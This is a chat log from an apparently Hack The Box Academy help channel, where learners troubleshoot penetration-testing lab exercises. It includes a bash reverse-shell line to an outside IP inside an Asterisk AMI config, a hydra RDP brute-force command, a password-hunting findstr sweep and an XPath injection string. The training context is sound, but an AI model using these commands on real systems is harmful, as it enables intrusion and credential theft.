#modules
can u dm me..i will send u pic there
ok
Im on last module called learning progress im stuck on last question where it compares 2 sets of numbers and asks what's the difference i need assistance anyone have a clue thank you
37.7-1.00
Hmmmm, i've already run mimikatz and dont return any functional for ms01
I run lsass attack and sam but nothing who will take me to admin on ms01
You can DM
Anyone manage to finish the Attacking Wordpress module?
Hy everyone. Can't solve the RDP question in academy https://academy.hackthebox.com/module/147/section/1327
Found login and pass but xfreerdp doesn't work. i tried this command with and without /cert:ignore /dynamic-resolution:
xfreerdp /v:10.129.202.136 /u:'xxxx' /p:'xxxxxxxx'
I'm getting this:
The above X.509 certificate could not be verified, possibly because you do not have
the CA certificate in your certificate store, or the certificate has expired.
Please look at the OpenSSL documentation on how to add a private CA to the store.
Do you trust the above certificate? (Y/T/N) Y
[12:50:53:784] [42421:42448] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 104: Connection reset by peer
[12:50:53:784] [42421:42448] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[12:50:54:401] [42421:42448] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 104: Connection reset by peer
[12:50:54:401] [42421:42448] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[12:50:54:401] [42421:42448] [ERROR][com.freerdp.core] - freerdp_post_connect failed
I also tried remmina, didn't work either
I have the exact same issue and haven't been able to figure it out either, I tried proxychains, sshuttle and chisel
Hello, is there someone who can help me with the module Password Attacks -> Pass the Certificate. I have a problem with the last part of first exercise - cannot connect to the victim through evil-winrm. I configured krb5, /etc/hosts, can ping dc01 but the command doesnt work:
└─$ evil-winrm -i dc01.inlanefreight.local -r INLANEFREIGHT.LOCAL
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure. Minor code may provide more information
Cannot contact any KDC for realm 'INLANEFREIGHT.LOCAL' Error: Exiting with code 1
I will appreciate somebody's time
this what i get with following command xfreerdp /v:10.129.202.136 /u:'xxxx' /p:'xxxxxxxx' +auth-only
[13:08:07:825] [69041:69042] [INFO][com.freerdp.client.x11] - Authentication only. Don't connect to X.
[13:08:09:354] [69041:69042] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[13:08:09:354] [69041:69042] [WARN][com.freerdp.crypto] - CN = WINSRV
[13:08:09:655] [69041:69042] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 104: Connection reset by peer
[13:08:09:655] [69041:69042] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[13:08:09:655] [69041:69042] [ERROR][com.freerdp.core] - Authentication only, exit status 1
I'm trying to finish the medium lab for the footprinting module but I can't seem to get the flag correct.. I found the HTB password in the SQL Management Studio table and it still says it's incorrect
I used this for that part:
xfreerdp3 /u:xxxxx /p:'xxxxx' /v:10.129.135.38
Are you doing that for the RDP section or the medium lab?
hi guys! i am trying to find Mark's password in this section Password Attacks, Page 5, Writing Custom Wordlists and Rules, but i havent understood how i am supposed to rip his OSINT info for a wordlist.. can anyone help me out?
It is provided in the section, look where it says "Exercise"
Check the hint, it's a combination of using the tools and using your own reasoning
Who would I need to contact if I think I have the right password but it still says it incorrect
I even looked up write ups, and they did the same thing... but the question says it's incorrect on HTB
Module Introduction to python3
That sounds like a wget, strings, and uniq sort kind of thing
I figured it out...
I really hate fonts that make l and I look the same...
What is the answer?
Apparently MSSQL Server Management Studio makes them look like that for the password query
You should ask for a nudge in the right direction instead of just flat out asking for the answer.
You won't learn anything by doing that
I couldn't find it bro
right, so ask how to find it rather than what the answer is
Nb
Just did AEN semi-blind, only looked up few things for a sanity check 
10/10 feel prepared for the exam
any suggestions
For the theme?
thats not an option
Nineteen worked for me, make sure it's disabled when editing
W
👍
when i try to visit it says page not responding
do i have to manually add this page ?
NVM i got it
you should probably take this to DMs as you're revealing a lot for a skill assessment
my bad, i got it
FYI
found on reddit: hydra -L username.list -P password.list rdp://10.129.202.136 -t 4
this got me creds without 'account on 10.129.136.137 might be valid but account not active for remote desktop' and they worked
apparently we were getting 'inactive' accounts or something like that. i don't understand why adding parallel tasks worked tho.
-t is threads, not tasks
lowering the threads means less bombardment of a service
it makes sense. thank you for explanation
Thank you again. This issue was a code pebcak. I was using the wrong addresses 🙂
@grand compass No. This is not a hacker for hire server and we don't condone illegal activities.
Okay just trying to find someone who’ll help
were you able to make it work?
I'm in a similar place. I found a authorization bearer token. I got AdminBot to give me a ready-to-use string version of it. But I've been getting invalid key with both and encoded versions of either. Even tried to package it in JSON. No luck. Have you found out more?
Have a question regarding the PenTest Getting Started Knowledge check. Comments and some walkthroughs mention looking at GTFOBins once the /usr/bin/php is found after checking sudo permissions. Q: When did they decide to look at GTFOBins?
I’ve only done the beginning but can’t spoil content on modules over tier 0, so dm
It's just a very common resource to look at if you think there is a utility that may allow you to privilege escalate. So as soon as you see that something like PHP can be ran as higher user or has S bit, you almost immediately check to see if a GTFObin command can be used.
@crimson leaf Thank you for the insight.
Also in addition, a common resource for Windows world to look at is lolbas
Is anyone available to have a look at my Burp Intruder payload attempt for "Skills Assessment - Using Web Proxies" question #3? I'm doing the two encoding methods in the correct order (at least I think I am). But the response I'm getting is a 404.
Has anyone completed the final assessment for LLM Output Attacks? I've been on it for 10 hours straight. I have 2 different authentication strings (assuming one of them isn't a LLM hallucination), but haven't been able to do anything with either of them (even with encodings). I could really use some advice! With fond regards, Exhausted-And-Collapsed-on-the-Threshold. 😅
I'm super confused because when I refresh the page at admin.php, the page renders and I see a login screen. But when I look at the requests and responses in Burp, I see the response saying "The requested URL was not found on this server."
When I add some test credentials, I get 200 response codes but the fuzzing doesn't seem to be working for me.
Hi , what modules in HTB should I learn for binary exploitation ?!
There is a skill path, Intro to Binary Exploitation
thanks 
hey in Tomcat - Discovery & Enumeration i keep getting a 404 when trying to go to /webapps/WEB-INF/web.xml
i added the vhost to /etc/hosts already
i can reach /docs no problem
404 means the page could not be found, not a dns error
a 404 error from a webserver means the resource you are visiting is not there
but the question is asking for me to find the user admin's role and so i must access the web.xml
and based on the module the map of tomcat says the web.xml is always in the /webapps/WEB-INF directory
im not at all asking for the answer, just advice on where im going wrong/missing a step?
oh wait
lol im looking for the wrong file
my bad
wait but i still need the web.xml to know the servlet that is associated with admin
I feel like I'm close but all my response lengths are similar so I must be missing something. I used the hint, but no luck.
anyone who wants to team for the CPTS prep?
yes
but im not done with course, are you? i got 4 modules left
i'll DM u
@fathom pendant do you have a moment?
FOR?
sorry caps lock was on
It seems pretty straightforward but I'm not getting there.
Im trying to enumerate Tomcat and i cant seem to navigate to the web.xml
i don't recall having many issues getting the info it asked for
Yo what's the meaning of Ports and what's an open port
@fathom pendant but im trying to get admin role which needs access to /WEB-INF correct? This is still enumeration not yet attacking yet.
have you tried using grok or chatgpt? They give a quick and detailed answer. You can also ask it to explain in simple terms, which is very useful.
👋Welcome
Anyone on that's finished "Skills Assessment - Using Web Proxies" question #3?
As a general note though @opal cape if you continue to ping me like that I will end up blocking you
my bad
I have a question regarding the timeline for modules. When it says it will take an average of 2 days to complete, what does that translate to in actual average hours spent on the module?
Asking for possible CEUs
1 day is measured as a working day
Got it so like 8 hours then per day?
Also i don't think HTB does CEUs, ik that they do CPEs
Learn about how CPEs are allocated on HTB Academy.
I was just going to add it through CompTIA, they just want you to do seminars/trainings and add that you did it manually. I am tracking that ISC2 automated that process with HTB
There's no guarantee that comptia will accept it
so if we see a mod online, we shouldnt @ them? we just ask question and wait? is that correct?
Correct. Mods aren't staff. They're volunteers in the community.
ok ok
CompTIA is pretty odd with how they accept CEUs, I know I was able to add my Air Force training for all my required CEUs, and there's barely any proof you need to provide besides saying you did it in a document.
They do audits, but I've never heard of something being audited by them
I would say that these modules relate with PenTest+ so I don't get why they would have a problem with it
The only time it's ok to random ping mods is for server related issues i.e. someone spamming the channels. And even then, that's what the seriousrulebreak ping is for
where?
password attacks
You gotta give detailed questions
We can't read your mind on what you're stuck on
generating custom wordlists
that section is a bit interesting, but you have all the keywords and info
And a link to how hashcat processes wordlists
still, I generated tens of wordlists and used different rules but none of them worked
Use simple rules also make sure every entry starts with a capital letter
You can write your own custom rules list
The base wordlist is simple, just all the keywords from what you're given
Cupp isn't needed
Neither is crunch
You can just write a wordlist.txt file
Then your custom rules should be written to take into account potential common ways to end passwords
you just need custom.rules made with hashcat, no others tools
Like throwing a !, or a <year> or a <year>! At the end
The link to the hashcat page on how to write rules is really helpful to get it working properly
If you wanna get fancy, figure out a way to filter out all the passwords that aren't at least 12 characters long
Thanks
u need to use autorun
also try to stay away from proxychains
it sucks so much
i dont know which question ur on, but proxychains works at the start.
just dm me, ill show u
Can you look at my erratum ;), i just hope it doesnt get missed
"Incorrect answer on HTB module"
I'm not staff
ohh how come you looked at my old one
Also in future still redact answer fields
I don't know what answer you're expecting tbh. But as far as the erratum stuff goes; if it's not a general Skill Issue ™️ then I don't really bother with responding
Hello everyone does anyone here know which Setting I need to enable in ZAP to edit like in the image provided?
Has anyone completed the final assessment for LLM Output Attacks? I've been on it since 5am and it's now 5pm and I still... can't... let... go... 😜 I have 2 different authentication strings (assuming one of them isn't a LLM hallucination), but haven't been able to do anything with either of them (even with encodings). I could really use some advice! With fond regards, Stranded PromptPhantom. 😅
Hey anyone knows how to get a reverse shell from Asterisk AMI. I tried creating extension and executing it. Didn’t work
```
Action: UpdateConfig
SrcFilename: extensions.conf
DstFilename: extensions.conf
Action-000000: NewCat
Cat-000000: hackbox2
Action-000001: Append
Cat-000001: hackbox2
Var-000001: exten
Value-000001: 1009,1,System(bash -i >& /dev/tcp/192.168.100.93/443 0>&1)
```
best to say the module and section. if it's box related then #boxes.
it was related to Wanderer Pro lab, nvm got it
#1263635449335910531 would be the place then
i got no access
You'll need to follow the instructions in #welcome to gain access to most channels, including #1263635449335910531.
hey, im getting this error "Cannot find path 'C:\Tools-' because it does not exist..Exception" when running Invoke-DomainPasswordSpray on module Active Directory Enumeration & Attacks section Internal Password Spraying - from Windows. Any solution?
that's a very straightforward answer. it says it can't find that directory. did you accidentally add a - after tools or are you trying to run from c:\tools-?
im running it from c:\Tools\
is this expecting a userlist? cause i have one with 2900 usernames and nothing happened
Make sure you import the PowerShell module and run it from the correct directory.
already did... now is giving me a lot of false positive
well.. that section isnt working well ... i already made as solution said and gave 3 user false positive, and using a list with the correct username didnt show it as success
Your error directly says C:\Tools- doesn't exist. Also the challenges don't normally follow what they teach exactly. You have to apply what you learned and sometimes go back and re-read it.
The module itself is a guide
Yo i wanna start ethical hacking and i know nothing. Plz help
i dont know why is saying C:\Tools- doesn't exist. im not putting it in my Invoke-DomainPasswordSpray command.
Sorry, what do you mean by is a guide? I am trying to follow the guide as well and I've tried exactly what it tells me to do but I still cannot RDP
Start with Academy, theres a path called Cyber Security Foundations
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
And that ^
Hey learner's, I am stuck on Attacking common services - medium
Didn't get any entry point please give me some hint
I am trying it since yesterday
Hey guys. I need some help. I'm working on network services in the Password Attack Module. It's taking forever on my machine via the vpn to crack the username and password especially using the netexec command. How do I get to use the networkresources.zip files in the pawnbox? It's suggested that using them in pawnbox will take lesser time.
Hello, my name is Yasmin, I currently use Parrot OS Home🦜 Linux I would like you to recommend some courses or tutorials on YouTube, thank you.
HELLO is there anyone from help center? I still haven't got an email and reply from help center yet . I mistakenly subscribed silver plan .Can anyone help me?
There is no support over discord. You will have to wait for an official support team reply via email.
As 0daybug said, support is not provided over discord. No one here can help you. It's the weekend, there is only limited support. Be patient and they'll get back to you.
Oh I see. Thanks for answering.
For this section: https://academy.hackthebox.com/module/57/section/498, I ran the script for all 10,000 pins with no results. I also tried the supposedly correct pin manually in the url, and I still got the "Incorrect Pin!" result. A reset did not help; has anyone else experienced this?
It’s also been the weekend.
w
Doing Pivoting, Tunnelling & Port forwarding section with Chisel as sub topic. Able to connect to pivot host as well as attack Host but when I try to run xfreeRDP using proxychains I get socket error or timeout message. Please help
I have tried several times and still it does not get connected but keeps on giving socket error
Add /timeout:10000 to the end of the rdp command.
Hey brothers don't ignore me, please give some hint
Good morning everyone, i have a question about the module "password Attacks" -> Writing Custom Wordlists and Rules
i've tried ALOT already but my hashcat seems getting exhausted with my custom wordlists i made & rule set
i mean did you scan everything did you enumerate the ports you found?
Sorry sir I DONE that now I stuck in HARD challenge I completed MEDIUM !
don't call me sir
the same question applies to hard if you're stuck at a foothold
That might break the TOS.
you don't need to use another user's rule list
you can write a very simple one that'd do the trick
you likely just didn't add something very simple to the list :P but it can be done with like a handful of rules
yea, i see the password & can deffo tell i missed something
since you already got it you can dm me with your custom.rule and i can see if i can tell you where you went wrong
One of my colleagues just popped me that github link & ngl it's very nice to have these rule sets
it's good to know how to write them just in case
@zealous portal this isn't that kind of server.
Hey, no worries — I understand this might not be the right place.
But just wondering... do you happen to know any Discord servers that support people learning cybersecurity, maybe even help with learning tools or resources?
Thanks a lot, I really appreciate any direction 🙏
this server has plenty of resources, and definitely supports people in learning. But not in the way that you are looking for. I suggest reading #welcome to learn what this server is about, there's plenty of free stuff out there on HackTheBox so you don't have to pay anything. And there's a #resources-tools channel where people share various different links to (generally) free tools and such to help others
Thanks a lot for the info!
I totally understand now. I’ll check those channels and explore the free tools you mentioned.
Really appreciate your help 🙏
in the short term though: looking for handouts will generally get you pushed away from many communities as they'll see it as you just trying to gain stuff without doing anything
Hi, Anyone available for a sanity check for the module Windows Lateral Movement -> WinRM? I managed to get the last question, but I would like to verify if I did in the intended way. Thanks
I would really appreciate a nudge for Client-Side Prototype Pollution. Are we not supposed to be able to read this script? ||prototypes.htb/devscript.js||
- 20 What's the password of the account you found?
Have any of you finished Using CME module? Its on CAPE path, but I am doing it as extra for CPTS.
I am stuck on the first question. looks like SMB null auth is disabled. tried --users --rid-brute. both didnt work. can anyone help?
you don't really need to do anything outside the CPTS path for CPTS
it also helps if you say what section you're on
sorry. Skills assessment. First Question.
Hint Review "Exploiting NULL/Anonymous Session", what can you use to enumerate users?
But null sessions are failing every time
it looks like you're meant to be utilizing chisel or a proxy setup
yeah the instructions start you off with telling you you need to connect to the internal proxy network using chisel
I see. okay. I will give that a try. Thanks
steps to connect to the target environment
what are you doing dude
@fathom pendant you still active so you can deal with this?
I'm sorry if this question was asked before, but did any of the password attack module sections got changed, that aren't entirely new? By that I mean, did the content of some of them changed but still get shown as completed for people that already completed the module before? Or just the new sections and that's it?
There's likely some changes in the existing sections
this is why you don't do drugs kids
and this is why the ping is disabled so idiots look like dumbasses when they try

several sections got changed around and more user friendly; alongside entirely different questions for some sections that are still marked "completed"
i believe the module should have a changelog
ah nvm the changelog only states "module v2 released"
you probably mean this right:
Thank you tho
i haven't fully dissected the module to update my notes i kinda only skimmed through for completion
password attack module is killing me PKINIT having oscrypto issues in pwnbox should it work on fresh pwnbox if i just git clone and run it or am i meant to be resolving oscrypto issues?
@spring island
despite connecting its failing
<--socket error or timeout!
running nxc with proxychains on the IP spawned right?
proxychains yeah, but you'll have to figure out the internal stuff
also make sure you have the proxychains config set properly
I got the proxychains4.conf edited with the correct port. I am supposed to try SMB null auth on the target spawned and connected to with chisel right?
first step is finding out the devices on the network :)
remember you're tasked with attacking the internal 172.16.15.0/24 network, so it won't be against the spawned target
- I tried to run a ping scan with proxychains but that didnt work
- I tried to use --gen-relay-list , but even that didnt work. This is for mapping the IPs which are on the internal network
any hint? I first need some valid IP to do SMB Null auth against right?
well proxychains generally dislikes icmp; but you can do a range with nxc
just specify the network/cidr instead of just ip
and run smb null auth on the cidr?
yep
Try pip3 install -I git+https://github.com/wbond/oscrypto.git, I will work on getting that information in the module itself
Refuses to work
└─$ proxychains nmap -p445 --open -n -T4 172.16.15.0/24
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-23 14:28 IST
Nmap done: 256 IP addresses (256 hosts up) scanned in 28.10 seconds
even tried nmap to find any valid ip. Proxychains + nxc doesnt even work.
the --force-reinstall seemed to have fixed it on pwnbox thank you can get passed that step now 🙏
throw -Pn on the nmap request
To add on to this: proxychains doesnt support ICMP and nmap tries to ping (ICMP requests) the target, -Pn just makes it assume that the target is up without pinging it
Hey i am in the setting up module in the Linux section and I am new to this field i have set up the ParrotOS VM but its giving me commands that i dont understand like to update things and install things is that ok or i am supposed to already understand?
you don't have to follow along directly, the example command even includes ...SNIP... meaning that it's cut off
but i dont understand like the commands itself
the main thing you need to know is that sudo apt install <some package here> is used to install packages, if you have a large list of tools
sudo apt install $(cat tools.list | tr "\n" " ") -y
$() is a bash construct that says "run whatever is in here before processing the rest of the first command"
so the $(cat tools.list | tr "\n" " ") part is saying read the file (tools.list) and translate (tr) every new-line (\n) to spaces " " so that a list like
one
two
three
four
turns into
one two three four
so it can be properly read by apt
the -y is just "assume yes whenever it asks questions"
ohhh
you can throw the command at chatGPT and just say "explain <command>" and it explains it fairly decently
here is the GPT explanation (Which i guess is close to mine):
The command you're asking about is a combination of shell utilities used in a Unix-like operating system (such as Linux) to install packages listed in a file. Let's break it down:
Command:
sudo apt install $(cat tools.list | tr "\n" " ") -y
Breakdown:
- sudo: This is used to run commands with superuser (root) privileges. You typically need sudo to install software or make system-wide changes.
- apt install: This part tells the system to install software packages. apt is a package manager for Debian-based distributions (like Ubuntu)
- $(...) (Command Substitution): This syntax is used to run a command and substitute its output into the main command. In this case, whatever the cat tools.list | tr "\n" " " command outputs will be inserted here
- cat tools.list: cat is used to display the contents of the file tools.list. This file presumably contains a list of package names, one per line.
- tr "\n" " ": The tr command is used to translate or delete characters. In this case, tr is replacing all newline characters (\n) with spaces (" "). This converts the list of package names (one per line) into a single line of space-separated package names.
- -y: The -y flag automatically answers "yes" to all prompts during the installation process. This is useful when you don't want to manually confirm the installation of each package.
Example:
Let’s say tools.list contains the following:
curl
git
vim
htop
The command would first execute cat tools.list, which outputs:
curl
git
vim
htop
Then, tr "\n" " " will transform this into:
curl git vim htop
Finally, the entire command becomes:
sudo apt install curl git vim htop -y
This installs curl, git, vim, and htop all at once, and the -y flag ensures that you won't be prompted for confirmation during the installation.
In Summary:
This command is a convenient way to install multiple packages listed in a file (tools.list) with one command, automatically confirming all prompts.
but the thing is I dont understand the commands themselves and how to use them so will this module be able to teach me it?
you generally don't need to run apt install in the linux fundamentals module
you will run into cases in higher tier modules where you may need to install a tool but the syntax is generally always given to copy/paste
the module itself encourages external research of some of the commands it presents in order to get a better grasp of how to do things
alr then thx
holy moly "pass the certificate" was rough thanks for the fix finished it now but many hours wasted before coming to discord, lesson learnt for next time
Yeah, one obvious thing that is not included in the module is how to enumerate/detect ESC8 vulnerability.
someone?
what's the section name?
Can anyone help me out
read and follow #welcome to access #1386042800323301447
this channel is for help with academy modules, not with the machines on the main platform
remove the -n
also the module is above tier 0; so avoid posting spoilers like that
thanks
ok
Does it mean by trial machine like its either i get a product activation key or i need to make a new windows vm every 90 days?
not necessarily need to make a new one, snapshots are what's important here
alr thx
just finished installing shall i run it in my host machine or inside a vm ?
Hey Marcie, I'm still stuck on that PW Attacks module... I can't find anything tied to LINUX01$ --> Genuinely getting frustrated, do you think you could give me another nudge? I can't find anything with realm etc, but I'm also feeling borderline stupid
/etc/ is an important place.
Yeah, I know that there's a keytab file there, but no matter what I had tried, I couldn't crack that... Is it not that file?
Hello guys, I am having some issues with HTTP Response Splitting exercise in the academy. I have a working XSS through target request, but I dont understand how to trigger xss on the admin. Can someone DM me?
Hi Guys,
Just started the CPTS journey.
I am doing Getting Started module. After spawning the target machine, i am running some scans and enumeration. But the http request times out very often. It works for some time and then it again times out. Any suggestion to make this journey smooth??
there's other ways to interact; like with ccache files
try changing the vpn regions
Thanks mate will try this
That module made me feel brain dead, I appreciate your help though, thanks! Got it
So I am in the middle of HTB Linux Fundamentals and I am trying to touch and mkdir. I am using Kali in a vbox, info so you can kind of guess where I am at. SO when I try touch and mkdir it says I don't have permissions. I am in the nixfund from the previous modules. Do I just have to be out of nix or should it work there too? If I confused you, you ain't the only one.
I'm having constant connection issues with https://academy.hackthebox.com/module/163/section/1554 . I've been doing exactly the same thing and it has only worked a few times out of many attempts. Any ideas please?
lol i'm in now! 20 attempts later... but if someone can explain the issue, i'd be very much appreciative
I need some help with Pass The Certificate.
https://academy.hackthebox.com/module/147/section/1335
I have managed to get jpinkman ccache, however unable to proceed further.
evil-winrm hits an error:
$ evil-winrm -i dc01.inlanefreight.local -r inlanefreight.local
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: User is not needed for Kerberos auth. Ticket will be used
Info: Establishing connection to remote endpoint
Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure. Minor code may provide more information
Cannot find KDC for realm "INLANEFREIGHT.LOCAL"
Error: Exiting with code 1
I have my etc hosts file set with the domain and DC IP:
$ cat /etc/hosts
10.129.234.174 dc01.inlanefreight.local inlanefreight.local dc01
10.129.234.172 ca01.inlanefreight.local ca01
etc krb5 config file:
$ cat /etc/krb5.conf
[libdefaults]
default_realm = inlanefreight.local
.................
[realms]
inlanefreight.local = {
kdc = dc01.inlanefreight.local
admin_server = dc01.inlanefreight.local
}
................
appreciate any help with this..
just completed the Password Attacks final. if anyone else completed i would love to know others attack path on this one. i did a few things not covered in this section and not sure if it was possible without a fair amount of tunnels.
also of course would prefer a DM to avoid spoilers 🙂
Have you set up the KRB5CCNAME variable correctly?
yes
$ klist
Ticket cache: FILE:/home/kali/htb/jpinkman.ccache
Default principal: jpinkman@INLANEFREIGHT.LOCAL
Valid starting Expires Service principal
06/23/2025 08:20:33 06/23/2025 18:20:33 krbtgt/INLANEFREIGHT.LOCAL@INLANEFREIGHT.LOCAL
Try editing this line: default_realm = inlanefreight.local to default_realm = INLANEFREIGHT.LOCAL
I uploaded a web shell successfully, and I received the response:
File successfully uploaded.
But when I try to access it via the path, I can't find the file or it doesn't execute.
This is part of the "File Upload Attacks – Blacklist Filters" section.
YES U ARE RIGHT!!!! THANKS SO MUCH!!!!
File will be uploaded to /profile_pictures/[name of file]
i know but i cant find it
You are the one who sets the file name, so if the file name is test.php, it will be uploaded to /profile_pictures/test.php , if not, upload it again.
Not sure about this issue, but if you have time, I'd recommend looking into ligolo-ng for pivoting. I found it a lot easier to use
hi guys, i'm stuck at new update Password Attacks- Credential Hunting in Network Shares, it hard to find domain admin pass :v i found some fake pass,... in share like .pdf, txt, csv, docx ps1.... anyhint? thanks
I used the netexec stuff covered in the section and tried keywords from the question, but I'm sure you could use other techniques from the section too.
i tried nxc but this with jbader seem faster?
findstr /SIM /C:"pass" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml *.docx *.pdf *.pptx *.csv *.xlsx
i found lots of fake pass
Then figure out a way to reduce the noise.
Hello the community, I am stuck at the "XPath - Blind Exploitation" And extracted the XML structure as
<accounts>
<acc>
<username></username>
<password></password>
</acc>
</accounts>
But when I try to extract the content of the password I got nothing adm'+or+substring(name(/accounts/acc/password/text()),1,1)=1+and+'1'='1
sure but is someone deleted my file? 
No one else should have access to your target host.
Okay noted, I will do. thanks man!
can you give me hint where folder is it? i'm sleepee
How to access to general
Your target IP. If you're tired, I highly suggest getting some rest. This lab will still be here tomorrow.

O... K
Good morning all, is anyone available to help with :
"Skills Assessment - Using Web Proxies" question #3: Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)
I think I have Intruder and my encoding set up correctly. Happy to share screenshots privately to avoid spoilers. Nothing stands out in my response lengths so I don't think I have it figured out yet. Been stuck on this one for a couple days.
Thanks to an amazing community contributor, we got there! Thank you!
did you get 31 chars
I don't mind looking it over. Feel free to DM.
When your Kali VM crashes and you scramble to get the cherry tree file with all your notes….
Yes. I'm sending the 31 characters plus my payload using the given wordlist in my request.
do you know if someone have a hint because i iterate or the character used to iterate for the password but no result if someone can help me please I am stuck from 3 hours thanks
Has anyone completed the final assessment for LLM Output Attacks? I have 2 different authentication strings (assuming one of them isn't a LLM hallucination), but haven't been able to do anything with them yet (even with encodings). I could really use some advice! With fond regards, Stranded AI-Ninja-wannabe.
does anybody completed Password Attack: Pass the Certificate Needed some Help!!!
anyone got a nudge for Attacking Common Services - Hard?
i ve got the final flag but it doesnt accept. Wondering if i did it wrong or something
You can DM what you have.
I recommend using the search function as this question has been asked plenty of times. You might find something in the search results that helps you.
I have a question from the seniors here ! i'm having trouble grasping the full concept of windows registry, like what sort of information does registry store?
im doing the passwords attacks' skill assessment can someone guide me on where to start or just a small hint would be helpful
The provided scenario tells you where to start. Think about the information you have and what section covered what to try with that type of information.
should i start by enumerating the given target the one that get spawned or the other 4
Since you will only be able to hit the target IP 10.129.xxx.xxx, I'd start there.
thank you
Hi guys, would very much appreciate any help on the module "Password Attacks - Writing Custom Wordlists and Rules".
Does my password list all have to be at least 12 characters long? Im not sure how to proceed any help would be nice 😄
What is the name of the function that returns the string inside the cpp file? (Format: FunctionName()).
does any one know the answer to this ?
Hey I can't seem to message in the general channel. Why is that?
can i dm u if its ok with u
lol @gray yacht , i probably because i worked for a long time maybe i was dizzy so i missed the file my query easily caught it from the first moment i ignored it. after a little rest maybe i was fine and saw it 
Why do you need to DM me?
i managed to ssh into the user , got the bash history found another user's creds but when i try to ssh to it it doesn't even resolve even when they are within the same ip subnet
You are going to need to setup something to reach internal IPs. If you've already done the pivoting module, this should be easy. If not, some Google searches should help you figure out some methods to try.
I'm feeling stuck starting medium footprinting, I've attempted to mount to the folder but was denied so i tried spoofing UID which didn't work because they were hidden. rpcclient doesnt allow unknown login so I'm not sure where to go
I guess I'm good to ask a question, so in linux fundamentals there is a task "Submit the full path of the "xxd" binary. " . I already solved it by which, but when I try to solve it by using locate, I see other PATHs too, and the question arises, what do other xxds do and why hack the box only requires "/usr/bin/xxd" this path and not for example this path "/snap/core/10126/usr/bin/xxd"
have you checked nfs?
i got same problem too, you can try to access with root on VM
switching to root prior to mounting ?
just simple sudo -i then you go there by cd 
ahhh thank you
Hey everyone, I am currently stuck on question 6 from the Pass The Hash module in the CPTS course. I am unable to catch the reverse shell from the DC. I have tried everything. Would anyone be able to help?
have you changed payload?
try another port and dont forget listening nc.exe
yeah im using a base64 powershell encoded payload over port 8001. listening via nc on the rdpclient MS01
touch and mkdir only work if you have write permissions to that directory
use CMD to run the payload, not PowerShell
it's expecting you to use the answer that would come from using which which resolves the first /path/to/binary that resolves
may i ask why?
well for one, that's what the example shows, no?
but for another it's likely how the payload gets processed in cmd vs powershell
the listener uses CMD however, the payload uses powershell
wrong; the payload invokes powershell
isnt that essentially what i just said..
nope
invoking powershell isn't the same as using powershell
i.e. in zsh you can invoke a bash command with bash -c "insert commands here"
ok well my apologies for not using the correct verbiage
Is there a way to know which sections have been updated in a module that has been updated? It's been a while since I've done password attacks
perhaps I should just go over everything again
you'd have to go through everything
and have they fixed yet the bug where old answers get saved when the questions change?
did you find the correct input? i am at exactly the same situation.
nope
also it's not a bug per-se it's just how things on the backend work
many such /feedback have been submitted
I mean it shouldn't be the desired behaviour there are better ways to address that
i would hope they did it's been about a year since they posted that
again /feedback
i can't rdp to lab machine in Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows From active directory module in cpts path.
@fathom pendant Sorry to tag you ! I wanted to know whether there are machines for students who have completed the "Introduction to windows cli" module?
thank you ! Although i see that most of the machines are connected to the multiple modules does it mean i will have to complete those modules as well?
generally speaking yes; the fundamental modules really don't prep you to be ready for many of the machines as a lot of the retired machines require some form of attack vector to even land on the machine in the first place
got it ! Study more xD thanks
Sorry boss ! 🤝
Need one more help I reached pivoting module ( m 11 ) in CPTS and till now there are 7 questions from different skill assessment and exercises which I am not able to complete after going crazy ! 🤯
Please anyone help me to complete them !
Try with dashes MM-DD-YYYY
I also changed the RegEx to match on MM/DD/YYYY as well
thank you for the help i tried that before, it seems that if you copy/paste the answer from terminal it is not acceptable. so i typed it 🙂
Maybe the - character wasn't exactly the same. Regardless, now works with slashes too.
yeah, just to mention it got accepted on US format MM/DD/YYYY if that is helpful to others
That's the format that PowerShell is providing it anyway, so it shouldn't be a problem.
ikr, anyways, thanks for jumpin in i appreciate it
Hey guys. I need some help. I'm working on network services in the Password Attack Module. It's taking forever on my machine via the vpn to crack the username and password especially using the netexec command. How do I get to use the networkresources.zip files in the Pwnbox? It's suggested that using them in Pwnbox will take lesser time.
You can find it in the first question, next to the Submit button.
Thank you. I wanted to know whether there's a way I can use the resources inside the Pwnbox instead of my own machine through a vpn connection.
just download it with wget, followed by the link
can anyone give me a sanity check on skill assesment for advanced XSS and csrf exploitation? ||I Was able to send a payload that fetches the admin.php and sends the response to my server, when I click I can see the XSS working, but no other user is clicking, should any moderator or admin click it?||
Thank you. It worked.
